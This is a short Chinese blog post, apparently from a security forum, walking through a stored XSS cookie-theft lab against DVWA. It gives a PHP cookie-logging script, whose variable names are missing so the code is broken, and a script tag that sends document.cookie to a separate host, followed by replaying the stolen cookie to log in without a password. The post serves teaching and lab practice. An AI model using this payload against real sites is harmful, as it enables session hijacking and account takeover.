你的位置: 部落首页 存储型xss盗取cookie实验
0

存储型xss盗取cookie实验

免费杀毒   2024年03月13日 19:11  

声明:仅供交流使用,严禁违法犯罪,否则后果自负

1,准备接收cookie的环境:

ip为172.24.10.105

代码为:保存为getCookie.php

<?php$=$_GET[''];$log=fopen(".txt","w");fwrite($log,$."\n");fclose($log);echo"***成功";?>

2,在实验环境插入js代码:

<script>document.location='http://172.24.10.105/getCookie.php?cookie='+document.cookie;</script>

通过审查元素把限制取消,然后插入js代码

然后重新访问这个页面发现进行了跳转

并在接收cookie的平台看到了cookie

换一个浏览器设置cookie

直接访问:

http://127.0.0.1/DVWA/

无需密码登录成功

欢迎关注微信公众号

域名注册
购买VPS主机

您或许对下面这些文章有兴趣:                    本月吐槽辛苦排行榜

小编
TA的专栏:  |   小编 的博客    |    我要投稿
关于本文的作者
本文标签:,
所属分类:免费杀毒
看贴要回贴有N种理由!看帖不回贴的后果你懂得的!


评论内容 (*必填):
表情插代码粗体斜体删除线
(Ctrl + Enter提交)   

部落快速搜索栏

各类专题梳理

网站导航栏

X
返回顶部